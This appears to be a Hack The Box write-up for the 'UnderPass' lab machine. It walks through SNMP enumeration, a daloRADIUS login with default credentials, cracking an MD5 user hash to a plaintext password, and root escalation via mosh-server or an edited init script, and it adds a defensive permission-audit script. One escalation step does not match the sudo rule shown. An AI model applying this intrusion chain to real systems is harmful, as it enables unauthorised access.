UnderPass (HTB – Easy)

UnderPass is a machine centered around SNMP enumeration, a misconfigured daloRADIUS installation, and a privilege escalation path through a writable /etc/init.d service. The foothold is obtained by extracting user information via SNMP and leveraging default daloRADIUS credentials. Privilege escalation is achieved by abusing the mosh-server init script and connecting with mosh-client to obtain a root shell.

Overview

Target: underpass.htb
Initial vector: SNMP enumeration → daloRADIUS default creds → user hash → SSH
Privilege escalation: writable init.d service (moshserver)

Enumeration

Nmap:

22/tcp ssh
25/tcp smtp
53/tcp dns (BIND)
80/tcp http (nginx)
161/udp snmp

The web server shows nothing useful. SNMP (UDP/161) is open — a strong indicator of misconfiguration.

SNMP Enumeration

Test community strings:

$ onesixtyone 10.10.11.48 public
-> Linux underpass ... Ubuntu 5.15 kernel

Walk the SNMP tree:

$ snmpwalk -v2c -c public 10.10.11.48
-> steve@underpass.htb

Metasploit’s SNMP enum module confirms the system is running **daloRADIUS**:

Hostname: UnDerPass.htb is the only daloradius server in the basin!
Contact: steve@underpass.htb

Foothold – daloRADIUS Default Credentials

Documentation indicates daloRADIUS is typically installed under /daloradius. Browse:

http://underpass.htb/daloradius/

Directory listing is forbidden, but fuzzing reveals:

/daloradius/app/users/login.php
/daloradius/app/operators/login.php

The login panel identifies itself as **daloRADIUS 2.2 beta**. Default credentials:

administrator : radius

Login succeeds.

Extracting User Credentials

Navigate to:

/daloradius/app/operators/mng-list-all.php

Select user svcMosh and view details:

Hash: 412dd4759978acfcc81deab01b382403

The hash is MD5. 

Crack it (hashcat, or an online lookup such as hashes.com):

-> svcMosh : underwaterfriends

SSH into the machine:

$ ssh svcMosh@10.10.11.48

User shell obtained.

Privilege Escalation – Writable moshserver Init Script

Run linpeas or manual checks:

$ sudo -l
-> (root) NOPASSWD: /usr/bin/mosh-server

Additionally, /etc/init.d/moshserver is writable by the security group:

$ ls -l /etc/init.d/moshserver
-rwxrwxr-- 1 root security ...

This allows modifying the service script to execute arbitrary commands as root.
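
The root cause here is an init script that root executes (via the sudo rule) but a non-root group can edit. The following audit script is an added example, not part of the original write-up: it parses `ls -l /etc/init.d` output and flags scripts that are world-writable or writable by a group other than root. The sample listing is constructed; only the moshserver line mirrors the permissions shown above.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample of `ls -l /etc/init.d` output (not captured from the box).
SAMPLE_LS = """\
-rwxr-xr-x 1 root root     2489 Mar 10 12:00 cron
-rwxrwxr-- 1 root security 1204 Mar 10 12:00 moshserver
-rwxr-xr-x 1 root root     3115 Mar 10 12:00 ssh
-rwxr-xrwx 1 root root      900 Mar 10 12:00 legacy
"""

# mode, link count, owner, group, size, month, day, time-or-year, name
LS_LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


@dataclass
class Finding:
    name: str
    owner: str
    group: str
    mode: str
    reason: str


def audit_init_scripts(ls_output: str) -> list[Finding]:
    """Return init scripts that a non-root principal could modify."""
    findings: list[Finding] = []
    for line in ls_output.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue  # skip "total N" and unparseable lines
        mode = m["mode"]
        group_writable = mode[5] == "w"   # group triplet is mode[4:7]
        other_writable = mode[8] == "w"   # other triplet is mode[7:10]
        if other_writable:
            findings.append(Finding(m["name"], m["owner"], m["group"], mode, "world-writable"))
        elif group_writable and m["group"] != "root":
            # Anyone in that group can rewrite a script root later executes.
            findings.append(Finding(m["name"], m["owner"], m["group"], mode,
                                    f"writable by group {m['group']}"))
    return findings


if __name__ == "__main__":
    for f in audit_init_scripts(SAMPLE_LS):
        # Remediation: chown root:root and chmod 755 the flagged script.
        print(f"{f.mode} {f.owner}:{f.group} {f.name} -> {f.reason}")
```

Run it against real output with `ls -l /etc/init.d | python3 audit.py` after swapping `SAMPLE_LS` for `sys.stdin.read()`.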

Exploit Path

  1. Edit /etc/init.d/moshserver and insert a reverse shell payload.
  2. Restart the service using sudo:

     $ sudo /etc/init.d/moshserver restart

Alternatively, use the intended path: run sudo mosh-server and connect with mosh-client, passing the displayed key through the MOSH_KEY environment variable:

$ sudo mosh-server
-> MOSH_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxx
$ MOSH_KEY=<key> mosh-client 127.0.0.1 <PORT>

A root shell is obtained.

Conclusion

UnderPass is a clean chain: SNMP leaks system details, daloRADIUS defaults provide admin access, user hashes lead to SSH, and a writable init script combined with mosh-server sudo privileges yields root. It’s a great example of how weak SNMP configurations can unravel an entire system.